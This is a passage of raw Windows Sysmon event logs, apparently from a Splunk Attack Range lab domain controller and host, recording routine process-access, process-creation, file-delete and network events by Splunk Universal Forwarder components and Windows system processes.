Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294164Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:19.242{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-13FF-6216-8706-000000003802}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294163Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:19.243{C8EA50B7-13FF-6216-8706-000000003802}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000294162Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:19.142{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EC8D70CB513C55E9281B8A3A983A4EE,SHA256=AD1BBDC2C40E7170A778CDE9F1610735BE81DC7EA87F8F522370C3F3828634F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218493Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:20.850{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9FD5BEB04F49E432ADE4A381CCF1F97,SHA256=EDC0D42FE9E50BEBD8968B5EF7E6FAA77090F98C4EBF42224DF47A91C575B35A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294189Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:20.821{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1400-6216-8906-000000003802}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294188Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:20.806{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294187Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:20.806{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294186Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:20.806{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294185Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:20.806{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294184Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:20.806{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1400-6216-8906-000000003802}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294183Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:20.806{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1400-6216-8906-000000003802}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294182Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:20.807{C8EA50B7-1400-6216-8906-000000003802}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000294181Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:20.389{C8EA50B7-1400-6216-8806-000000003802}2086380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294180Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:20.157{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C5CDFDE67C0E40A703B081817D584C3,SHA256=34C098520FE80874E0C10E7F09953E2D09ED26A8FA723388C3AA3A8E88930E6D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218492Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:17.596{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51464-false10.0.1.12-8000- 10341000x8000000000000000294179Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:20.120{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1400-6216-8806-000000003802}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294178Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:20.120{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294177Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:20.120{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294176Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:20.120{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294175Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:20.120{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294174Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:20.120{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1400-6216-8806-000000003802}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294173Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:20.120{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1400-6216-8806-000000003802}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294172Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:20.121{C8EA50B7-1400-6216-8806-000000003802}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000294199Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:21.476{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1401-6216-8A06-000000003802}7156C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294198Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:21.476{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294197Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:21.476{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294196Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:21.476{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294195Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:21.476{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294194Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:21.476{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1401-6216-8A06-000000003802}7156C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294193Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:21.476{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1401-6216-8A06-000000003802}7156C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program 